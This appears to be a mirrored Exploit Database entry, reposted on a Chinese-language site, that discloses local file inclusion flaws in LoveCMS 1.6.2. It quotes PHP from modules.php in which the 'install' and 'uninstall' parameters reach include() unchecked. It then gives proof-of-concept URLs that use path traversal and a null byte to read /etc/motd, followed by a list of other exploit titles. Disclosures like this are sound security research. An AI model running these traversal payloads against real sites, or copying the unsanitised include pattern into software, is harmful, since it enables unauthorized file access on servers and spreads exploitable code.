LoveCMS 1.6.2 Final – Multiple Local File Inclusions

Exploit Database
34 阅读

作者： cOndemned

日期： 2010-12-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15831/

LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities
found by cOndemned
vendor: http://lovecms.org/
download: http://sourceforge.net/project/showfiles.php?group_id=168535

source of /system/admin/modules.php

	13.	if(isset($_GET['install']))
	14.	{
	15.		$include = $_GET['install'];
	16.		
	17.		include(LOVE_ROOT . '/modules/' . $include . '/info.php');

	[...]

	61.	if(isset($_GET['uninstall']))
	62.	{
	63.		$include = $_GET['uninstall'];
	64.		
	65.		include(LOVE_ROOT . '/modules/' . $include . '/info.php');


proof of concept

	http://[host]/[lovecms]/system/admin/modules.php?install=../../../../../etc/motd%00
	http://[host]/[lovecms]/system/admin/modules.php?uninstall=../../../../../etc/motd%00

last Exploits
LoveCMS 1.6.2 Final – Multiple Local File Inclusions的更多信息

ERPnext 11 – Cross-Site Scripting：
CrushFTP 7.2.0 – Multiple Vulnerabilities：
ColdFusion 8.0.1 – Arbitrary File Upload / Execution (Metasploit)：
E-membres 1.0 – Remote Database Disclosure：
Joomla! Component Foobla Suggestions 1.5.1.2 – Local File Inclusion：
MODx CMS 2.2.14 – Cross-Site Request Forgery Bypass / Reflected Cross-Site Scripting / Persistent Cross-Site Scripting：
WordPress Plugin Share and Follow 1.80.3 – ‘admin.php’ Cross-Site Scripting：
Bugzilla 4.2 – Tabular Reports Cross-Site Scripting：